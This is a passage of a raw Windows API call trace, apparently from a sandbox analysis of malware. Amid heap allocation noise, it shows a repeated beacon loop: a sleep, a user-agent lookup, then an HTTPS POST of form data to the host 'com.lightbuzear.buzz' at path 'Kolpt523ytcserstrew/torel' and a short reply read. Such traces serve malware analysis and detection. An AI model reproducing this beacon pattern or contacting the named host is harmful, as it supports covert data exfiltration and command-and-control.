lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0270.081] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0270.081] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0270.081] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0270.081] Sleep (dwMilliseconds=0x2710) [0270.110] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0270.110] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0270.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0270.110] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0270.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0270.110] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0270.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0270.110] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0270.110] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0270.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edf8 [0270.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0270.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0270.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edf8 | out: hHeap=0x4780000) returned 1 [0270.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0270.111] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0270.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef00 [0270.111] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0270.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0270.112] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0270.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0270.112] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0270.112] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0270.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0270.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0270.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0270.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0270.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0270.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0270.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0270.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0270.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee40 [0270.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0270.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edf8 [0270.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee40 | out: hHeap=0x4780000) returned 1 [0270.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0270.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edf8 | out: hHeap=0x4780000) returned 1 [0270.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800578 [0270.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0270.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0270.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0270.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0270.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0270.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0270.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0270.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0270.115] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0270.115] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0270.115] FreeLibrary (hLibModule=0x71780000) returned 1 [0270.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0270.116] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0270.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0270.116] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0270.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0270.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0270.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0270.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0270.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0270.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0270.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eeb8 [0270.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eee8 [0270.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eeb8 | out: hHeap=0x4780000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0270.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eee8 | out: hHeap=0x4780000) returned 1 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480efd8 [0270.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0270.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0270.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0270.118] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0270.118] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005f0 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0270.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0270.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0270.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0270.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0270.119] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0270.119] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0270.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eeb8 [0270.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0270.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0270.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eeb8 | out: hHeap=0x4780000) returned 1 [0270.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef90 [0270.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0270.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0270.199] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0270.200] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee28 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed98 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee28 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48306b0 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0270.200] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0270.201] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0270.201] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0270.201] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0270.201] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0270.202] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0270.202] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0270.202] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0270.202] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0270.202] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0270.202] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0270.202] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0270.202] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0270.202] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef78 [0270.203] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0270.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0270.203] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0270.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830750 [0270.203] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0270.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0270.203] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0270.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0270.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0270.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0270.203] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0270.204] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0270.204] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0270.204] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0271.250] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0271.250] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0271.250] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0271.250] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ede0 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eff0 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ede0 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eff0 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9e60 [0271.251] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0271.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0271.252] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9e60 | out: hHeap=0x4780000) returned 1 [0271.252] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9e60 [0271.252] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0271.252] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0271.252] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0271.253] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0271.253] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0271.253] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0271.253] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0271.254] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0271.254] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0271.254] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0271.254] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0271.254] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0271.254] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee28 [0271.254] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0271.254] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0271.255] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee28 | out: hHeap=0x4780000) returned 1 [0271.255] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830868 [0271.255] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0271.255] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0271.255] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0271.255] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0271.255] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0271.255] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0271.255] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0271.255] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0271.256] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0271.256] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0271.256] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0271.256] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0271.256] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0271.256] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0271.257] FreeLibrary (hLibModule=0x71570000) returned 1 [0271.257] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0271.257] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0271.257] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005f0 | out: hHeap=0x4780000) returned 1 [0271.257] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0271.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0271.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0271.258] Sleep (dwMilliseconds=0x2710) [0271.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0271.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef78 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0271.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eff0 [0271.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0271.276] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0271.279] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0271.279] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0271.279] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0271.280] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 